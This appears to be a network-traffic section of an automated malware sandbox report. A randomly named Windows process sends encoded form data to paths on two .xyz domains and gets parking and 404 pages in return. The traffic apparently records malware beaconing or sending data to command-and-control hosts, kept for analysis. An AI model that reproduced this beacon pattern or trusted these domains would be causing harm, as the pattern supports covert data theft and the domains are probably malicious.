                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjVjNGQxYTEtMjdiYi00ZWNiLTkxMjUtMjIyMDhhMGEzNzAzIiwicGFnZV90aW1lIjoxNzI2NDcyMz


                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                  18          192.168.2.5  49730        199.59.243.226  80                2796  C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  Timestamp                             Bytes transferred  Direction  Data
                                                  Sep 16, 2024 09:39:52.752088070 CEST  832                OUT        POST /wwak/ HTTP/1.1
                                                  Host: www.personal-loans-jp8.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 229
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.personal-loans-jp8.xyz
                                                  Referer: http://www.personal-loans-jp8.xyz/wwak/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 4a 31 37 6d 71 31 56 73 79 41 52 4f 4e 2f 71 44 44 34 54 4e 70 43 4b 30 6b 50 4a 48 43 64 46 55 69 62 54 6d 50 68 53 54 33 78 35 4f 6f 6b 70 4d 65 52 49 4e 67 63 77 38 65 75 30 34 34 38 42 43 36 72 58 6d 68 42 30 4f 30 4f 70 75 38 62 44 65 46 33 78 32 51 33 39 55 48 48 41 47 57 33 31 49 71 51 4f 57 4f 64 70 72 38 6c 53 30 73 4e 4c 43 55 35 62 58 4a 68 33 49 6c 75 72 7a 2b 43 47 45 72 65 6f 38 58 41 30 39 38 69 51 2f 41 67 38 4d 30 59 65 63 59 55 46 67 61 64 4c 56 76 6b 56 42 68 53 65 35 70 65 32 66 39 6c 31 46 4b 46 72 50 50 56 4b 67 58 6c 49 77 62 59 4d 58 70 2f 39 65 48 39 2b 4b 39 79 39 62 6f 6d 38 30 58 6d 51 51 74 57 65 50 52 51 35 2f 66 68 79 57
                                                  Data Ascii: prutfR_P=J17mq1VsyARON/qDD4TNpCK0kPJHCdFUibTmPhST3x5OokpMeRINgcw8eu0448BC6rXmhB0O0Opu8bDeF3x2Q39UHHAGW31IqQOWOdpr8lS0sNLCU5bXJh3Ilurz+CGEreo8XA098iQ/Ag8M0YecYUFgadLVvkVBhSe5pe2f9l1FKFrPPVKgXlIwbYMXp/9eH9+K9y9bom80XmQQtWePRQ5/fhyW
Sep 16, 2024 09:39:53.196399927 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                  date: Mon, 16 Sep 2024 07:39:53 GMT
                                                  content-type: text/html; charset=utf-8
                                                  content-length: 1154
                                                  x-request-id: 3d0013b9-96ac-4670-89ef-e265e0dc2b5f
                                                  cache-control: no-store, max-age=0
                                                  accept-ch: sec-ch-prefers-color-scheme
                                                  critical-ch: sec-ch-prefers-color-scheme
                                                  vary: sec-ch-prefers-color-scheme
                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==
                                                  set-cookie: parking_session=3d0013b9-96ac-4670-89ef-e265e0dc2b5f; expires=Mon, 16 Sep 2024 07:54:53 GMT; path=/
                                                  connection: close
                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 59 39 43 49 45 47 6c 38 49 51 43 33 73 5a 5a 74 4a 66 55 78 6e 54 45 45 6a 38 30 4d 39 2f 45 2f 6a 5a 75 64 7a 56 70 6d 77 4b 55 34 72 37 30 6f 73 65 6c 74 73 44 74 32 6a 55 32 6f 4a 50 76 6c 77 54 39 67 30 71 56 32 49 73 38 4a 38 42 67 66 70 62 76 79 6e 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Sep 16, 2024 09:39:53.196472883 CEST | 607 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2QwMDEzYjktOTZhYy00NjcwLTg5ZWYtZTI2NWUwZGMyYjVmIiwicGFnZV90aW1lIjoxNzI2NDcyMz


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49731 | 199.59.243.226 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 16, 2024 09:39:55.295613050 CEST | 1849 | OUT | POST /wwak/ HTTP/1.1
                                                  Host: www.personal-loans-jp8.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.personal-loans-jp8.xyz
                                                  Referer: http://www.personal-loans-jp8.xyz/wwak/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 4a 31 37 6d 71 31 56 73 79 41 52 4f 4e 2f 71 44 44 34 54 4e 70 43 4b 30 6b 50 4a 48 43 64 46 55 69 62 54 6d 50 68 53 54 33 78 68 4f 6f 53 64 4d 4d 41 49 4e 68 63 77 38 58 4f 30 37 34 38 42 6c 36 76 37 71 68 42 6f 30 30 4b 5a 75 38 39 2f 65 44 43 64 32 61 33 39 55 59 58 41 57 53 33 30 63 71 51 2b 6f 4f 64 5a 72 38 6c 53 30 73 4f 54 43 54 6f 62 58 5a 52 33 4c 69 75 72 6e 36 43 48 70 72 65 77 4b 58 42 31 49 38 53 77 2f 41 42 4d 4d 6b 2b 4b 63 58 55 46 69 58 39 4c 7a 76 6c 70 61 68 53 53 50 70 65 71 35 39 6e 56 46 4c 44 65 45 4b 6c 61 69 45 6b 67 43 63 66 41 73 70 62 70 53 48 62 69 65 39 56 4d 31 6f 45 77 6f 56 47 55 69 6d 57 43 41 4f 52 74 4f 56 58 65 64 71 4c 7a 73 43 2f 4f 52 2b 69 4d 34 71 41 34 70 31 6c 2f 55 7a 59 73 75 65 79 67 38 77 44 43 4c 52 46 69 63 53 6e 4d 58 36 56 64 58 45 34 46 31 77 75 66 75 75 63 6d 73 41 73 52 45 6e 68 50 48 63 34 36 6a 34 76 41 46 58 6a 61 61 30 41 36 7a 5a 37 78 78 4e 4d 75 4e 46 48 76 67 37 37 6e 58 4e 69 32 49 2f 2b 32 6e 48 66 35 4c 4d [TRUNCATED]
Data Ascii: prutfR_P=J17mq1VsyARON/qDD4TNpCK0kPJHCdFUibTmPhST3xhOoSdMMAINhcw8XO0748Bl6v7qhBo00KZu89/eDCd2a39UYXAWS30cqQ+oOdZr8lS0sOTCTobXZR3Liurn6CHprewKXB1I8Sw/ABMMk+KcXUFiX9LzvlpahSSPpeq59nVFLDeEKlaiEkgCcfAspbpSHbie9VM1oEwoVGUimWCAORtOVXedqLzsC/OR+iM4qA4p1l/UzYsueyg8wDCLRFicSnMX6VdXE4F1wufuucmsAsREnhPHc46j4vAFXjaa0A6zZ7xxNMuNFHvg77nXNi2I/+2nHf5LM [TRUNCATED]
Sep 16, 2024 09:39:55.748812914 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                  date: Mon, 16 Sep 2024 07:39:55 GMT
                                                  content-type: text/html; charset=utf-8
                                                  content-length: 1154
                                                  x-request-id: 031f4dda-5d89-4305-8d0f-243cb00ed183
                                                  cache-control: no-store, max-age=0
                                                  accept-ch: sec-ch-prefers-color-scheme
                                                  critical-ch: sec-ch-prefers-color-scheme
                                                  vary: sec-ch-prefers-color-scheme
                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==
                                                  set-cookie: parking_session=031f4dda-5d89-4305-8d0f-243cb00ed183; expires=Mon, 16 Sep 2024 07:54:55 GMT; path=/
                                                  connection: close
                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 59 39 43 49 45 47 6c 38 49 51 43 33 73 5a 5a 74 4a 66 55 78 6e 54 45 45 6a 38 30 4d 39 2f 45 2f 6a 5a 75 64 7a 56 70 6d 77 4b 55 34 72 37 30 6f 73 65 6c 74 73 44 74 32 6a 55 32 6f 4a 50 76 6c 77 54 39 67 30 71 56 32 49 73 38 4a 38 42 67 66 70 62 76 79 6e 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Sep 16, 2024 09:39:55.748838902 CEST | 607 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDMxZjRkZGEtNWQ4OS00MzA1LThkMGYtMjQzY2IwMGVkMTgzIiwicGFnZV90aW1lIjoxNzI2NDcyMz


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 49732 | 199.59.243.226 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 16, 2024 09:39:57.840626955 CEST | 534 | OUT | GET /wwak/?prutfR_P=E3TGpDthwwVtcd6zArHMi0+elvxdJNsp076mRxbq1wlJhRxdRCVM2u01G8le2+tM+4jqrTcu85UNoN7iByxUa15ZbVJvSSR5vxb+VJw93FLmyr7mIfPMGWfmtP/A6wTj3w==&u8b=M0MH_xux6 HTTP/1.1
                                                  Host: www.personal-loans-jp8.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Sep 16, 2024 09:39:58.290278912 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                  date: Mon, 16 Sep 2024 07:39:57 GMT
                                                  content-type: text/html; charset=utf-8
                                                  content-length: 1522
                                                  x-request-id: 3a467895-8111-4853-9000-5f1d204b0026
                                                  cache-control: no-store, max-age=0
                                                  accept-ch: sec-ch-prefers-color-scheme
                                                  critical-ch: sec-ch-prefers-color-scheme
                                                  vary: sec-ch-prefers-color-scheme
                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_utwIIUkKlT9J6SaYZn/lvpfIOmSz4DHKsGIs5O+mm4jM2kzh/4j+eBu3zycpUx4oz2fe1n8xOXM1pSeAbMwUYA==
                                                  set-cookie: parking_session=3a467895-8111-4853-9000-5f1d204b0026; expires=Mon, 16 Sep 2024 07:54:58 GMT; path=/
                                                  connection: close
                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 75 74 77 49 49 55 6b 4b 6c 54 39 4a 36 53 61 59 5a 6e 2f 6c 76 70 66 49 4f 6d 53 7a 34 44 48 4b 73 47 49 73 35 4f 2b 6d 6d 34 6a 4d 32 6b 7a 68 2f 34 6a 2b 65 42 75 33 7a 79 63 70 55 78 34 6f 7a 32 66 65 31 6e 38 78 4f 58 4d 31 70 53 65 41 62 4d 77 55 59 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_utwIIUkKlT9J6SaYZn/lvpfIOmSz4DHKsGIs5O+mm4jM2kzh/4j+eBu3zycpUx4oz2fe1n8xOXM1pSeAbMwUYA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Sep 16, 2024 09:39:58.290292025 CEST | 224 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2E0Njc4OTUtODExMS00ODUzLTkwMDAtNWYxZDIwNGIwMDI2IiwicGFnZV9
Sep 16, 2024 09:39:58.290302992 CEST | 751 | IN | Data Raw: 30 61 57 31 6c 49 6a 6f 78 4e 7a 49 32 4e 44 63 79 4d 7a 6b 34 4c 43 4a 77 59 57 64 6c 58 33 56 79 62 43 49 36 49 6d 68 30 64 48 41 36 4c 79 39 33 64 33 63 75 63 47 56 79 63 32 39 75 59 57 77 74 62 47 39 68 62 6e 4d 74 61 6e 41 34 4c 6e 68 35 65
                                                  Data Ascii: 0aW1lIjoxNzI2NDcyMzk4LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cucGVyc29uYWwtbG9hbnMtanA4Lnh5ei93d2FrLz9wcnV0ZlJfUD1FM1RHcER0aHd3VnRjZDZ6QXJITWkwK2VsdnhkSk5zcDA3Nm1SeGJxMXdsSmhSeGRSQ1ZNMnUwMUc4bGUyK3RNKzRqcXJUY3U4NVVOb043aUJ5eFVhMTVaYlZKdlNTUjV2eGIrVkp3OT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 49733 | 162.0.239.141 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 16, 2024 09:40:03.496592045 CEST | 794 | OUT | POST /vnd3/ HTTP/1.1
                                                  Host: www.quantumnests.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 209
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.quantumnests.xyz
                                                  Referer: http://www.quantumnests.xyz/vnd3/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 38 61 70 48 36 47 76 48 6c 49 67 68 38 68 6f 55 47 31 65 7a 31 38 39 6a 36 4a 6c 6c 72 76 6e 4d 79 48 54 4e 71 35 58 44 69 67 5a 43 56 44 4b 67 6e 66 63 78 46 78 43 7a 33 48 33 57 37 32 79 4b 45 51 6b 59 39 62 58 6b 35 30 57 69 2f 79 4a 43 56 71 31 66 51 31 68 54 6f 34 52 72 43 30 70 58 44 74 66 64 64 68 4a 45 4f 50 4d 42 69 6f 42 52 6d 53 2b 32 51 4f 64 38 2b 38 6d 37 53 32 73 42 31 47 7a 61 59 30 78 75 59 6c 6b 44 4e 59 6e 41 7a 73 72 44 2f 55 6d 52 54 53 75 55 58 6b 6f 44 63 64 76 4e 70 33 63 66 65 72 64 4a 79 71 61 41 72 59 78 43 4d 4a 32 6a 6f 54 68 6d 37 72 59 6d 37 48 4c 38 79 31 67 3d
                                                  Data Ascii: prutfR_P=8apH6GvHlIgh8hoUG1ez189j6JllrvnMyHTNq5XDigZCVDKgnfcxFxCz3H3W72yKEQkY9bXk50Wi/yJCVq1fQ1hTo4RrC0pXDtfddhJEOPMBioBRmS+2QOd8+8m7S2sB1GzaY0xuYlkDNYnAzsrD/UmRTSuUXkoDcdvNp3cferdJyqaArYxCMJ2joThm7rYm7HL8y1g=
Sep 16, 2024 09:40:04.086756945 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Date: Mon, 16 Sep 2024 07:40:03 GMT
                                                  Server: Apache
                                                  Content-Length: 18121
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body><!-- partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
Sep 16, 2024 09:40:04.086779118 CEST | 1236 | IN | Data Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                                                  Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d="M19.8 282.4h-3
Sep 16, 2024 09:40:04.086791992 CEST | 448 | IN | Data Raw: 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                                                  Data Ascii: "M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M239.8 282.4h-
Sep 16, 2024 09:40:04.086803913 CEST | 1236 | IN | Data Raw: 22 73 74 32 22 20 64 3d 22 4d 32 37 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 38 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c
                                                  Data Ascii: "st2" d="M279.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M289.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M299.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M309.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M319.8
Sep 16, 2024 09:40:04.086816072 CEST | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64
                                                  Data Ascii: > <path class="st2" d="M499.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M1000 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M990 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M980 282.4h-3l-6.8 25.2h3z"/> <path class="s
